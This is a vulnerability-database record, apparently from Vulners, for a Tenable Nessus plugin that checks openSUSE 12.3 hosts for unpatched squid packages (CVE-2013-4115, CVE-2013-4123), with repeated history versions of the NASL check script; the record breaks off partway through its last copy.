{"id": "OPENSUSE-2013-699.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)", "description": "This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]", "published": "2014-06-13T00:00:00", "modified": "2020-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/75140", "reporter": "This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html", "https://bugzilla.novell.com/show_bug.cgi?id=830319", "https://bugzilla.novell.com/show_bug.cgi?id=829084", "https://bugzilla.novell.com/show_bug.cgi?id=677335"], "cvelist": ["CVE-2013-4115", "CVE-2013-4123"], "type": "nessus", "lastseen": "2020-01-01T00:27:15", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:squid", "p-cpe:/a:novell:opensuse:squid-debuginfo", "p-cpe:/a:novell:opensuse:squid-debugsource"], "cvelist": ["CVE-2013-4115", "CVE-2013-4123"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]", "edition": 11, "enchantments": {"dependencies": {"modified": "2019-12-13T08:15:48", "references": [{"idList": ["OPENVAS:1361412562310802057", "OPENVAS:1361412562310867694", "OPENVAS:867694", "OPENVAS:866446", "OPENVAS:1361412562310868180", "OPENVAS:1361412562310871232", "OPENVAS:1361412562310866446", "OPENVAS:866539", "OPENVAS:1361412562310866539", "OPENVAS:1361412562310868397"], "type": "openvas"}, {"idList": ["30A04AB4-ED7B-11E2-8643-8C705AF55518"], "type": "freebsd"}, {"idList": ["RHSA-2014:1148"], "type": "redhat"}, {"idList": ["GLSA-201309-22"], "type": "gentoo"}, {"idList": ["EDB-ID:26886"], "type": "exploitdb"}, {"idList": ["FREEBSD_PKG_30A04AB4ED7B11E286438C705AF55518.NASL", "FEDORA_2013-13468.NASL", "MANDRIVA_MDVSA-2013-199.NASL", "FEDORA_2013-13493.NASL", "SUSE_11_SQUID-130909.NASL", "SOLARIS11_SQUID_20140114.NASL", "OPENSUSE-2013-700.NASL", "SQUID_3_2_13.NASL", "SQUID_3_2_12.NASL", "ALA_ALAS-2014-411.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:VULN:13190", "SECURITYVULNS:DOC:29651"], "type": "securityvulns"}, {"idList": ["ALAS-2014-411", "ALAS-2014-433"], "type": "amazon"}, {"idList": ["CVE-2013-4115", "CVE-2013-4123"], "type": "cve"}, {"idList": ["ELSA-2014-1148"], "type": "oraclelinux"}, {"idList": ["SUSE-SU-2016:1996-1", "SUSE-SU-2016:2089-1"], "type": "suse"}, {"idList": ["CESA-2014:1148"], "type": "centos"}]}, "score": {"modified": "2019-12-13T08:15:48", "value": 7.3, "vector": "NONE"}}, "hash": "2eb0d18fd15b4a5a0ba1ce6868a6db051a7f27e64b4144577f76729171a78ff1", "hashmap": [{"hash": "b034a93b608eb52f64d3654bd54c1517", "key": "description"}, {"hash": "7f18f59328bd12da4fa30bb9ecfa417b", "key": "href"}, {"hash": "28bcb1165dd12fbeecaf144ae8efd1ea", "key": "pluginID"}, {"hash": "e9866a672d1f669dcfb25433a3e513ef", "key": "references"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "bc8a3240a3892002dc2383d889ce08c3", "key": "cpe"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "3ac27814e21dbbdbed6b1f79a83eb599", "key": "reporter"}, {"hash": "803e6e04e94c43e379784942aacbfc60", "key": "title"}, {"hash": "4247f101bb7aea04fc4134f24162dbd6", "key": "sourceData"}, {"hash": "5a7504dfe859a7ccbaf560628f6442ad", "key": "modified"}, {"hash": "14b67dbf5e4b07f7620b0f638b93dab1", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/75140", "id": "OPENSUSE-2013-699.NASL", "lastseen": "2019-12-13T08:15:48", "modified": "2019-12-02T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "75140", "published": "2014-06-13T00:00:00", "references": ["https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html", "https://bugzilla.novell.com/show_bug.cgi?id=830319", "https://bugzilla.novell.com/show_bug.cgi?id=829084", "https://bugzilla.novell.com/show_bug.cgi?id=677335"], "reporter": "This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-699.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75140);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n\n script_name(english:\"openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)\");\n script_summary(english:\"Check for the openSUSE-2013-699 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=830319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debuginfo-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debugsource-3.2.11-3.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid / squid-debuginfo / squid-debugsource\");\n}\n", "title": "openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified"], "edition": 11, "lastseen": "2019-12-13T08:15:48"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2013-4115", "CVE-2013-4123"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes problems identifying a port number as specified by the client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]", "edition": 1, "enchantments": {}, "hash": "676f3505ef98c81e733c37dff9697ae47e540337ab1274a761ed841aeff546fb", "hashmap": [{"hash": "53b491f7497b42ff65860fd149862189", "key": "references"}, {"hash": "b47046803518278e4bff8d0125be28c7", "key": "description"}, {"hash": "a9c8031d74a07d7e33fd88d65f153ea7", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "efa2129b963542f80aa4c167a7de7b98", "key": "modified"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "28bcb1165dd12fbeecaf144ae8efd1ea", "key": "pluginID"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "04e30ced88898010d2cc19c543c69af9", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "803e6e04e94c43e379784942aacbfc60", "key": "title"}, {"hash": "14b67dbf5e4b07f7620b0f638b93dab1", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=75140", "id": "OPENSUSE-2013-699.NASL", "lastseen": "2016-09-26T17:26:18", "modified": "2016-08-15T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "75140", "published": "2014-06-13T00:00:00", "references": ["http://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html", "https://bugzilla.novell.com/show_bug.cgi?id=830319", "https://bugzilla.novell.com/show_bug.cgi?id=829084", "https://bugzilla.novell.com/show_bug.cgi?id=677335"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-699.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75140);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2016/08/15 14:21:39 $\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n script_osvdb_id(95165, 95257);\n\n script_name(english:\"openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)\");\n script_summary(english:\"Check for the openSUSE-2013-699 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=830319\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debuginfo-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debugsource-3.2.11-3.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid / squid-debuginfo / squid-debugsource\");\n}\n", "title": "openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:squid", "p-cpe:/a:novell:opensuse:squid-debuginfo", "p-cpe:/a:novell:opensuse:squid-debugsource"], "cvelist": ["CVE-2013-4115", "CVE-2013-4123"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes problems identifying a port number as specified by the client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6d24efc71c2c9f30117c89c2c7ea8d885f2fdc1aa228963d95dbde6bab458532", "hashmap": [{"hash": "53b491f7497b42ff65860fd149862189", "key": "references"}, {"hash": "b47046803518278e4bff8d0125be28c7", "key": "description"}, {"hash": "a9c8031d74a07d7e33fd88d65f153ea7", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "28bcb1165dd12fbeecaf144ae8efd1ea", "key": "pluginID"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "4395952e0539c0ade337a4524a70675e", "key": "modified"}, {"hash": "27eaff5ce6000664ae48501526e56a6f", "key": "sourceData"}, {"hash": "bc8a3240a3892002dc2383d889ce08c3", "key": "cpe"}, {"hash": "803e6e04e94c43e379784942aacbfc60", "key": "title"}, {"hash": "14b67dbf5e4b07f7620b0f638b93dab1", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=75140", "id": "OPENSUSE-2013-699.NASL", "lastseen": "2018-09-02T00:05:54", "modified": "2018-07-16T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "75140", "published": "2014-06-13T00:00:00", "references": ["http://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html", "https://bugzilla.novell.com/show_bug.cgi?id=830319", "https://bugzilla.novell.com/show_bug.cgi?id=829084", "https://bugzilla.novell.com/show_bug.cgi?id=677335"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-699.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75140);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n\n script_name(english:\"openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)\");\n script_summary(english:\"Check for the openSUSE-2013-699 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=830319\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debuginfo-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debugsource-3.2.11-3.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid / squid-debuginfo / squid-debugsource\");\n}\n", "title": "openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-02T00:05:54"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:squid", "p-cpe:/a:novell:opensuse:squid-debuginfo", "p-cpe:/a:novell:opensuse:squid-debugsource"], "cvelist": ["CVE-2013-4115", "CVE-2013-4123"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes problems identifying a port number as specified by the client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a2c04c43c9f00dc8c4d83e6772bc9fc2330f9cffbb22eb0cdaafda85aba0aa6e", "hashmap": [{"hash": "b47046803518278e4bff8d0125be28c7", "key": "description"}, {"hash": "a9c8031d74a07d7e33fd88d65f153ea7", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "28bcb1165dd12fbeecaf144ae8efd1ea", "key": "pluginID"}, {"hash": "e9866a672d1f669dcfb25433a3e513ef", "key": "references"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "bc8a3240a3892002dc2383d889ce08c3", "key": "cpe"}, {"hash": "803e6e04e94c43e379784942aacbfc60", "key": "title"}, {"hash": "4247f101bb7aea04fc4134f24162dbd6", "key": "sourceData"}, {"hash": "14b67dbf5e4b07f7620b0f638b93dab1", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=75140", "id": "OPENSUSE-2013-699.NASL", "lastseen": "2018-11-13T17:08:25", "modified": "2018-11-10T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "75140", "published": "2014-06-13T00:00:00", "references": ["https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html", "https://bugzilla.novell.com/show_bug.cgi?id=830319", "https://bugzilla.novell.com/show_bug.cgi?id=829084", "https://bugzilla.novell.com/show_bug.cgi?id=677335"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-699.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75140);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n\n script_name(english:\"openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)\");\n script_summary(english:\"Check for the openSUSE-2013-699 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=830319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 